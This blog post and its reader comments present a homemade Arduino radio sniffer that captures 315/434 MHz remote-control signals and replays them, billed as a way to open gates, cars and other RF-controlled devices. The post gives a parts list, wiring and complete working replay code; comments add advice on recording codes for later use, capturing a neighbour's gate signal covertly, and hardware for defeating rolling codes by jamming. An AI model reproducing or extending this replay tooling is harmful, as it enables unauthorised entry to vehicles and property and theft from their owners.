RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

The more I get to play with hardware, the more I get to see how security is lacking or implemented poorly (and I’m being very polite here). This time, I would like to share my 315mhz/434mhz RF Sniffer project, which can be used to open poorly protected gates, cars, etc. Nothing new under the sun, only my own take on building such a device.

 

TIP – The size of the antenna is VERY important. Don’t neglect it – use the right length and use a wave calculator for future reference.

 

The story

I wanted to see how easy it is to open a keyless car using an Arduino. And then I wanted to simultaneously control multiple appliances operating on different frequencies (315Mhz/434Mhz).

Using the following design, you can easily make a fuzzer to randomly open/close/control all kind of RF receivers out-there. You have been warned.

Current version of the sniffer will resend whatever it sniffs 10 times. Behavior is easily changeable.

I am using the RCSwitch library to reduce heavy thinking on my part. Mission accomplished.

 

Shopping List

Amount Part Type Properties
2 Inductor wire antenna
1 Red LED – 5mm package 5 mm [THT]; leg yes; color Red (633nm)
1 Arduino Uno (Rev3) type Arduino UNO (Rev3)
1 315Mhz RF-LINK_RX package rf-link_rx; part # WRL-10533
1 434Mhz RF-LINK_RX package rf-link_rx; part # WRL-10532
1 315Mhz RF-LINK_TX package rf-link_tx; part # WRL-10535
1 434Mhz RF-LINK_TX package rf-link_tx; part # WRL-10534

 

Scheme

We connect both receivers/transmitters like the following:

RF_Sniffer_bb

Code

And here is the Arduino code. Use at your own risk.


/*
 * RF Sniffer (C) Elia Yehuda 2014
 * 
 * This program was coded.
 *
 * No warranty whatsoever.
 * Using this program will cause something, most likely problems.
 *
 */

#include <RCSwitch.h>

// number of times to resend sniffed value. use 0 to disable.
#define RESEND_SNIFFED_VALUES 10

// ye, thats the led pin #
#define LED_PIN 13

// class for 315 receiver & transmitter
RCSwitch rf315Switch = RCSwitch();
// class for 434 receiver & transmitter
RCSwitch rf434Switch = RCSwitch();

void setup()
{
        // print fast to console
        Serial.begin(115200);

        // 315 receiver on interrupt #0 (pin #2)
        rf315Switch.enableReceive(0);  
        // 315 transmitter on pin #4
        rf315Switch.enableTransmit(4);
        // how many resends
        rf315Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);
        
        // 434 receiver on interrupt #1 (pin #3)
        rf434Switch.enableReceive(1);  
        // 434 transmitter on pin #5
        rf434Switch.enableTransmit(5);
        // how many resends
        rf434Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);
        
        Serial.println("[+] Listening");
}

// simple decimal-to-binary-ascii procedure
char *tobin32(unsigned long x)
{
        static char b[33];
        b[32] = '\0';
        
        for ( int z = 0; z < 32; z++) {
                b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
        }
        
        return b;
}

void process_rf_value(RCSwitch rfswitch, int rf)
{
        char str[120];
        unsigned long value;

        // flash a light to show transmission
        digitalWrite(LED_PIN, true);
        
        value = rfswitch.getReceivedValue();
        if (value) {
                sprintf(str, "[+] %d Received: %s / %010lu / %02d bit / Protocol = %d",
                        rf, tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol() );
        } else {
                sprintf(str, "[-] %d Received: Unknown encoding (0)", rf);
        }
        Serial.println(str);

        // resend the sniffed value (RESEND_SNIFFED_VALUES times)
        rfswitch.send(value, rfswitch.getReceivedBitlength());
        
        // reset the switch to allow more data to come
        rfswitch.resetAvailable();
        // stop light to show end of transmission
        digitalWrite(LED_PIN, false);
}

void loop()
{

        if (rf315Switch.available()) {
                process_rf_value(rf315Switch, 315);
        }

        if (rf434Switch.available()) {
                process_rf_value(rf434Switch, 434);
        }
}

57 thoughts on “RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

    1. ofc.

      The hw scheme I provided is 100% same as the one I used in my testings. The sw part is a stripped-down code of my full project, but is enough to get one started.

      With a few modifications to the code, one can simply record the sniffed data instead of immediately resending it. Also, for useful results, when resending, a delay() should be considered for obvious reasons😉

      Most vulnerable targets I found are remote-controlled gates and old cars. Also weather stations seems to produce a lot of noise.

      Using same logic, one can add 816Mhz tx/rx to cover most widely used RF out there. and rule them all🙂

  1. Awesome project. Can u give any details as to how you can save the codes it sniffs? I’m looking to do an automation project and this fits the bill.

    Thanks

  2. simple circuit, simple code – but not flying! receiver not seeing anything? i see chatter on other sites about a 1M resistor between data line and ground and a 330 Mfd cap and production changes on RX board pushing less power thru data line. no joy! any clues???

  3. Ziggy, Really like your project. I have the library, replicated the circuit and code – and quadrupled checked everything – but the receivers are never ‘available’. I have three 315 MHz devices to ‘sniff’ but with/without antennas, placing devices near/far from the antenna and even ordering/installing new RX / TX boards – has no impact on the results. Commenting out the .available test just yields the same data stream regardless of the device I test and, in fact , powering off the circuit has no impact on the data stream. Used SparkFun supplier.
    Please, any hints for me?

    1. I totally understand your frustration since it took me a while and some trial & error to get all to work as smoothly (eg, I too have looked into connecting a resistor to the data line…).

      I think you should first make sure your hw is 100% supported with this library; maybe you need to use a different lib/code to match your receiver – play with the code until you start getting some RAW (hex) data, then adjust it to your purpose.

      g’luck.

  4. I have to reach our house by a shared drive with an electronic gate. The owner will not give the remote to copy. Is there any way I can buy a sniffer so that I can copy the opening code?
    I know nothing about electronics

      1. Thank you for that but it looks as though I have to get hold of my neighbours remote to work it. What I need is something I can leave in my garden so that when he uses his remote it will pick up the signal. Then I should be able to duplicate it with this sort of device you suggest

    1. Hello Roger,

      What your neighbor has done is illegal. You have the right to access your property and he cannot unreasonably deny you access. If his property is considered the dominant property, he has the right to put up a gate, but he must give you unrestricted access to it. This includes a key. It is illegal for him to tell you to wait for him to open the gate for you, as you may need access when he is not home.

      1. Thank you
        To a non-electrician it looks very complex to make a sniffer and I am trying to find someone in the UK to make the device. How close does it need to be to the gate to pick up the signal – or maybe it needs to be close to the remote being used?

      2. IIRC from my testings, the sniffer worked at a 10 meter distance, and obviously can be extended with better equipment.

        And I’m no electrician by any means🙂 Just start hacking around with Arduino, and you’ll find yourself playing with those [electronic] lego pieces in no time.

  5. I want to know does this sketch work with any modulation and encoding out of the box? For example does it simply sniff and transmit raw data? Kind of like hackrf_transfer using a raw iq/wav file to do a replay attack? Or does the library define some sort of encoding like ask ook

    Thank you

  6. Hi thanks for your tutorial !! just wondering if you could help me out ive got a arduino uno and a 433mhz receiver and transmitter im having trouble i can pick up signals from some remotes but not others ? but they are all 433mhz remotes and i see in alot of the tutorials people are using the 8 pin 433mhz receiver mines only the 4pin which from what i can tell is the cheap version by what it cost😄 and i see alot more people using the other ones could this be why im only picking up certain 433mhz signals from some remotes and not others ? sorry if its a dumb question ! still new to this

    1. good question, but i have to admit i never played with 8-pin receivers. maybe it’s encoding issue, distance, antenna – i would play with any of those vectors to test for any changes. Try to obtain an SDR (HackRF or alike) to watch your signals and debug it further😉

      1. Hello Z4ziggy

        I am going to try and find someone to make the sniffer for me but before I do can I clarify one thing.
        If I locate the device near the gate and activate it when he exits will it record the signal for me?
        If it does that is ideal if I can then transmit the signal to one of the RF duplicators that you advise I assume?

        many thanks

        Roger

      2. Yep, the device should sniff the signal when located near the gate. And those duplicators already has the ‘record’ function in them, so they should work best for u.

  7. Im confused how do you start and end it? Where are the buttons? also I did this and I get an error for RCSswitch missing where do I put that is that code that is supposed to be added?

    1. there is no start/stop to the code provided – only endless sniffing & replaying routine, as a basic template example.
      regarding RCSwitch, consult your IDE docs how to install Arduino libraries (usually its extracting the zip in ~/Arduino/libraries/ folder).

  8. Hello z4ziggy, is there any chance to write in private?
    I connected all wires, but nothing is working. The LED is flashing for about 5 times the first time I connect the arduino to the PC. Then it stops. The serial monitor is showing nothing except + Listening.
    When connecting the LED to the breadboard -> the orange LED on the arduino illuminates with half of its power.
    I would appreciate your help. Thanks

    1. I doubt I can help much – you’ll have todo the debugging yourself.
      I suggest you start with connecting only 1 transmitter and getting it work 1st – it might take some playing with the code and the pins to get the correct layout, so don’t be discouraged – enjoy the path😉

  9. Is it possible for me to build this RF sniffer if I am not in anyway experienced with the subject(programming or electronics)?

  10. is it possible for me to build the RF sniffer with no experience with electronics nor programming?

    I want to build the sniffer but I also have a question or two.

  11. Here is just one question. Can this device open any RF receiver with out having any contact with, lets say the remote for the garage? Can I just walk up to any random garage and with this project just open it? Please correct me if my point of view on this project is totally of the subject and if you don’t mind is their not a link or any information on what exactly does this RF sniffer do. I posted a link on yahoo asking the same question and no one is getting back to me. But if it is too much inconvenience, I understand.

    1. The project I’m describing here is a sniffer – eg, it will sniff an existing signal, and will let you replay it at your will. it will not fuzz or try different combos to open unknown garage doors. You can find in the comments above links to other ready-made products (sold on ebay/aliexpress) which wont require much technical know-how like this one.

  12. SORRY Z4ZIGGY for the hassle. So this project wont work on those high tech remotes that frequency level cycle or I am not sure?

  13. I am truly sorry for all the questions but I would like to ask you is their such a device that can work on remotes that have the cycling frequencies on them? Another thing I would like to know, is their such a device like you mentioned before that can fuzz or try different combos to open unknown garage doors?

    I really try to find this information on google but its that easy for me and like I said before if its too much inconvenience, I understand.

    Thanks z4ziggy

  14. hi z4ziggy I hope you don’t mind me bothering you with all the questions but I have done some more research on RF sniffers and I have found Sammy kamkars invention to be quite interesting, I am sure you have heard of him. He’s device (rolljam) can bypass rolling codes witch is the device I asked you about previously. I just wanted to know if the HackRF one device can do everything your RF sniffer can do?

    1. Sammy’s device is a more advanced device. As I said earlier – this project is a starting point.

      regarding HackRF – it should be doable. Maybe consider BladeRF or others which are full-duplex.

  15. hi z4ziggy, please can you answer this question for me I tried asking others but I don’t succeed. I am sure you heard of Andrew Nohawk and I want to learn how to hack rolling codes and he shows you how on his website. I want to learn while having everything I need in my possession, I would find it much easier that way going through it step by step. As I read through it I find it quite difficult finding out everything I need. Could you be kind enough and tell me everything I need to go about doing this. ps I don’t know wether I should get a yardstick one or rfcat or even both so if you could help me with this I would be so grateful.

    hope to hear from you soon!

    thanks

    1. He actually uses TWO YardStickOne since it’s half-duplex device (eg, can only send OR receive at the same time). You can use BladeRF or other full-duplex SDR device which supports this frequency range. good luck.

  16. So if I get a full-duplex SDR device, I can receive and transmit at the same time then there is no need for two devices.
    what does he use to jam the signal since I am trying to hack rolling codes?

    I really appreciate you help, I try asking these questions on yahoo but people just think I am some thief trying his luck.

  17. Hello z4ziggy, I am doing research at my school and am interested in possibly using your design to demonstrate this device to our local police department and write a report on the increasing problem of these type of devices. Is everything you listed as well as the code and diagram enough to get one to work? What is the difference between the code you have here and your full one? I also wanted to get your approval on the use of your design for this purpose.

    1. Feel free to use this as you like. My private code was a bit more malicious – it saved the sniffed data and allowed me to resend it whenever I wanted (by pressing a button), but this should be enough for a demo and you can always enhance it yourself. good luck.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s